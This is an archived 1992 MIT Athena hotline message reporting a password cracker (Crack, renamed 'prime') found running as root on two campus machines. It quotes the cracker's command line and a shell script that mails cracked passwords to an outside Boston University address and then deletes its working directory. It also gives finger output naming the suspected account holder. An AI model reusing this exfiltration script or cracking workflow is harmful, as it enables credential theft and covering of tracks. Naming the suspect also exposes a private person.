[9190] in Hotline Meeting
Password Cracker
daemon@ATHENA.MIT.EDU (jsc@Athena.MIT.EDU)
Sun May 24 04:34:41 1992
From: jsc@Athena.MIT.EDU
Date: Sun, 24 May 92 04:34:28 -0400
To: hotline@Athena.MIT.EDU
Hi, didn't know who better to send this to; if this is the wrong place,
please forward it to the correct people.
Anyway, I found a program sucking up lots of processor time on both
m16-034-7 and m16-034-18:
USER PID %CPU %MEM SZ RSS TT STAT TIME COMMAND
root 17301 79.4 18.2 1260 1160 p0 R N 1977:39 /u1/qq/generic/prime -n19 -i /u1/qq/pws/pw.17166 Dicts/bigdict.Z
Looking in /u1/qq, I found the source and executable to Crack (renamed
prime), a password cracker, owned by UID 326. Looking over the
files, it looks like this person is trying to crack BU passwords from
MIT. In one of the files is the following:
#!/bin/sh
while (test -f Runtime/D*)
do
sleep 60
done
sleep 30
cat Runtime/F* 2>&1 | mail -s 'Fb' lambast@buengf.bu.edu
cd ..
rm -rf qq
exit 0
finger lambast@buengf.bu.edu
[buengf.bu.edu]
Login name: lambast In real life: Ho Yi
Office: student
Directory: /usr3/home/lambast Shell: /bin/tcsh
Last login Fri May 22 16:57 on ttytb from W20-575-20.MIT.E
No Plan.
Doing a last shows root logged in around May 22, 17:30, on both
machines and w20-575-20, for about 8 minutes.
A tar file of the contents of /u1/qq is in /mit/bitbucket/foo/qq.tar.
-Jin
